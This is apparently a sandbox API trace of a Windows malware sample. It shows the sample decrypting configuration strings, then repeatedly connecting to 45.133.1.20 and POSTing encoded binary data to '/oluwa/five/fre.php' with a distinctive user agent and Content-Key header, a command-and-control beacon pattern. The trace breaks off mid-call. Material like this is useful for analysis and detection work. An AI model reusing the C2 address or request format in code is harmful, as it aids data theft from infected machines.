0x6a0000 [0242.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0242.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.614] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.623] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0242.632] GetProcessHeap () returned 0x6a0000 [0242.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0242.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.633] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0242.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.634] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.635] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.635] GetProcessHeap () returned 0x6a0000 [0242.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0242.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.637] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0242.642] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.642] CryptDestroyKey (hKey=0x6ad520) returned 1 [0242.643] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.643] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0242.644] GetProcessHeap () returned 0x6a0000 [0242.644] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.645] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.645] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.646] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.648] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.649] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.649] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.649] GetProcessHeap () returned 0x6a0000 [0242.649] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0242.649] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.650] GetProcessHeap () returned 0x6a0000 [0242.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0242.650] GetProcessHeap () returned 0x6a0000 [0242.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.651] GetProcessHeap () returned 0x6a0000 [0242.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0242.651] GetProcessHeap () returned 0x6a0000 [0242.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0242.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.652] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.658] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.658] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0242.667] GetProcessHeap () returned 0x6a0000 [0242.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0242.668] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.668] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad060) returned 1 [0242.669] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.670] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.671] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.671] CryptSetKeyParam (hKey=0x6ad060, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.671] GetProcessHeap () returned 0x6a0000 [0242.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0242.672] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.672] CryptDecrypt (in: hKey=0x6ad060, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0242.673] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.674] CryptDestroyKey (hKey=0x6ad060) returned 1 [0242.674] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.675] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0242.675] GetProcessHeap () returned 0x6a0000 [0242.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.676] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0242.677] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.677] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0242.678] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.678] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0242.679] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.680] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0242.680] GetProcessHeap () returned 0x6a0000 [0242.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0242.680] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0242.680] GetProcessHeap () returned 0x6a0000 [0242.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0242.680] socket (af=2, type=1, protocol=6) returned 0x7c8 [0242.680] connect (s=0x7c8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0242.703] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0242.703] GetProcessHeap () returned 0x6a0000 [0242.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0242.703] GetProcessHeap () returned 0x6a0000 [0242.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0242.704] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.705] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.705] GetProcessHeap () returned 0x6a0000 [0242.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5578 [0242.705] GetProcessHeap () returned 0x6a0000 [0242.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.706] GetProcessHeap () returned 0x6a0000 [0242.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0242.706] GetProcessHeap () returned 0x6a0000 [0242.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0242.707] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.757] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.757] GetProcessHeap () returned 0x6a0000 [0242.757] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0242.757] GetProcessHeap () returned 0x6a0000 [0242.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.758] send (s=0x7c8, buf=0x6bd460*, len=242, flags=0) returned 242 [0242.766] send (s=0x7c8, buf=0x6bb998*, len=159, flags=0) returned 159 [0242.766] GetProcessHeap () returned 0x6a0000 [0242.767] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6db728 [0242.767] recv (in: s=0x7c8, buf=0x6db728, len=4048, flags=0 | out: buf=0x6db728*) returned 204 [0242.838] GetProcessHeap () returned 0x6a0000 [0242.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0242.839] GetProcessHeap () returned 0x6a0000 [0242.839] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0242.839] GetProcessHeap () returned 0x6a0000 [0242.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5578 | out: hHeap=0x6a0000) returned 1 [0242.840] GetProcessHeap () returned 0x6a0000 [0242.840] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0242.841] closesocket (s=0x7c8) returned 0 [0242.841] GetProcessHeap () returned 0x6a0000 [0242.841] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0242.841] GetProcessHeap () returned 0x6a0000 [0242.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.842] GetProcessHeap () returned 0x6a0000 [0242.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0242.842] GetProcessHeap () returned 0x6a0000 [0242.843] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0242.843] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6db728, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x14fc) returned 0x7c8 [0242.845] Sleep (dwMilliseconds=0xea60) [0242.848] GetProcessHeap () returned 0x6a0000 [0242.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0242.849] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.849] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.868] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.869] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0242.879] GetProcessHeap () returned 0x6a0000 [0242.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b6878 [0242.879] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.880] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b6878, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0242.881] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.881] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.882] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.882] GetProcessHeap () returned 0x6a0000 [0242.882] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6878 | out: hHeap=0x6a0000) returned 1 [0242.883] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.884] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0242.884] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.885] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0242.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.886] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0242.886] GetProcessHeap () returned 0x6a0000 [0242.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.886] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.887] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0242.890] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.891] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0242.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.891] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0242.892] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.892] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0242.892] GetProcessHeap () returned 0x6a0000 [0242.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0242.893] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0242.893] GetProcessHeap () returned 0x6a0000 [0242.893] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0242.893] GetProcessHeap () returned 0x6a0000 [0242.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0242.894] GetProcessHeap () returned 0x6a0000 [0242.894] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0242.894] GetProcessHeap () returned 0x6a0000 [0242.894] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0242.895] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.895] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0242.903] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.903] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0242.911] GetProcessHeap () returned 0x6a0000 [0242.911] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0242.912] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.913] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0242.913] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.913] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0242.914] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.914] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0242.914] GetProcessHeap () returned 0x6a0000 [0242.915] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0242.916] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.917] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0242.918] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.919] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0242.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0242.921] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0242.921] GetProcessHeap () returned 0x6a0000 [0242.921] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0242.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.923] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0242.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.925] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0242.926] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.926] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0242.927] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0242.927] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0242.927] GetProcessHeap () returned 0x6a0000 [0242.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0242.928] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0242.928] GetProcessHeap () returned 0x6a0000 [0242.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baae0 [0242.928] socket (af=2, type=1, protocol=6) returned 0x7cc [0242.928] connect (s=0x7cc, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0242.962] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0242.962] GetProcessHeap () returned 0x6a0000 [0242.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0242.963] GetProcessHeap () returned 0x6a0000 [0242.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6db728 [0242.963] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.964] wvsprintfA (in: param_1=0x6db728, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0242.964] GetProcessHeap () returned 0x6a0000 [0242.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6c5038 [0242.964] GetProcessHeap () returned 0x6a0000 [0242.965] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.965] GetProcessHeap () returned 0x6a0000 [0242.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4910 [0242.965] GetProcessHeap () returned 0x6a0000 [0242.965] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6db728 [0242.966] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0242.966] wvsprintfA (in: param_1=0x6db728, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0242.966] GetProcessHeap () returned 0x6a0000 [0242.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0242.966] GetProcessHeap () returned 0x6a0000 [0242.967] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db728 | out: hHeap=0x6a0000) returned 1 [0242.967] send (s=0x7cc, buf=0x6bd460*, len=242, flags=0) returned 242 [0242.967] send (s=0x7cc, buf=0x6bb998*, len=159, flags=0) returned 159 [0242.967] GetProcessHeap () returned 0x6a0000 [0242.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0242.968] recv (in: s=0x7cc, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0243.045] GetProcessHeap () returned 0x6a0000 [0243.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0243.046] GetProcessHeap () returned 0x6a0000 [0243.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0243.046] GetProcessHeap () returned 0x6a0000 [0243.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5038 | out: hHeap=0x6a0000) returned 1 [0243.046] GetProcessHeap () returned 0x6a0000 [0243.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0243.046] closesocket (s=0x7cc) returned 0 [0243.047] GetProcessHeap () returned 0x6a0000 [0243.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baae0 | out: hHeap=0x6a0000) returned 1 [0243.047] GetProcessHeap () returned 0x6a0000 [0243.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0243.047] GetProcessHeap () returned 0x6a0000 [0243.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0243.048] GetProcessHeap () returned 0x6a0000 [0243.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0243.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1500) returned 0x7cc [0243.050] Sleep (dwMilliseconds=0xea60) [0243.052] GetProcessHeap () returned 0x6a0000 [0243.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0243.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0243.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.060] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0243.077] GetProcessHeap () returned 0x6a0000 [0243.077] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0243.078] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0243.078] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, 